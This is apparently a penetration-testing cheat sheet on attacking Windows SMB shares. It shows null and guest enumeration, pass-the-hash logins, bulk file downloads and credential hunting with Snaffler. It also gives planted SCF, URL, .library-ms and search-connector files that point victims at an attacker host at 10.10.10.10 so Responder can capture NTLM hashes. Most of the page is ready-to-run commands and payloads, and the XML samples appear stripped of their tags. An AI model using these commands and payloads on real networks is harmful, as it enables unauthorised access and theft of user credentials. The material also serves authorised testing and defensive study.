# Internal - Shares ## READ Permission > Some shares can be accessible without authentication, explore them to find some juicy files * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec) - The Network Execution Tool ```ps1 nxc smb 10.0.0.4 -u guest -p '' -M spider_plus nxc smb 10.0.0.4 -u guest -p '' --get-file \\info.txt.txt infos.txt.txt --share OPENSHARE ``` * [ShawnDEvans/smbmap](https://github.com/ShawnDEvans/smbmap) - a handy SMB enumeration tool ```powershell smbmap -H 10.10.10.10 # null session smbmap -H 10.10.10.10 -r PATH # recursive listing smbmap -H 10.10.10.10 -u invaliduser # guest smb session smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*" ``` * [byt3bl33d3r/pth-smbclient](https://github.com/byt3bl33d3r/pth-toolkit) from path-toolkit ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$ ls # list files cd # move inside a folder get # download files put # replace a file ``` * [SecureAuthCorp/smbclient](https://github.com/SecureAuthCorp/impacket) from Impacket ```powershell smbclient -I 10.10.10.100 -L ACTIVE -N -U "" Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk use Sharename # select a Sharename cd Folder # move inside a folder ls # list files ``` * [smbclient](#) - from Samba, ftp-like client to access SMB/CIFS resources on servers ```powershell smbclient -U username //10.0.0.1/SYSVOL smbclient //10.0.0.1/Share # Download a folder recursively smb: \> mask "" smb: \> recurse ON smb: \> prompt OFF smb: \> lcd '/path/to/go/' smb: \> mget * ``` * [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) - a tool for pentesters to help find delicious candy ```ps1 snaffler.exe -s - snaffler.log # Snaffle all the computers in the domain ./Snaffler.exe -d domain.local -c -s # Snaffle specific computers ./Snaffler.exe -n computer1,computer2 -s ​ # Snaffle a specific directory ./Snaffler.exe -i C:\ -s ``` ## WRITE Permission Write SCF and URL files on a writeable share to farm for user's hashes and eventually replay them. Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop) ```ps1 # Farmer to receive auth farmer.exe [seconds] [output] farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely farmer.exe 8888 60 # one minute # Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks crop.exe [options] Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec ``` ### SCF Files Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0` ```powershell [Shell] Command=2 IconFile=\\10.10.10.10\Share\test.ico [Taskbar] Command=ToggleDesktop ``` Using [`netexec`](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/slinky.py): ```ps1 netexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk netexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP ``` ### URL Files This attack also works with `.url` files and `responder -I eth0 -v`. ```powershell [InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\10.10.10.10\%USERNAME%.icon IconIndex=1 ``` ### Windows Library Files > Windows Library Files (.library-ms) ```xml @windows.storage.dll,-34582 6 true imageres.dll,-1003 {7d49d726-3c21-4f05-99aa-fdc2c9474656} true false \\\\workstation@8888\\folder ``` ### Windows Search Connectors Files > Windows Search Connectors (.searchConnector-ms) ```xml imageres.dll,-1002 Microsoft Outlook false true \\\\workstation@8888\\folder.ico {91475FE5-586B-4EBA-8D75-D17434B8CDF6} \\\\workstation@8888\\folder ``` ## References * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)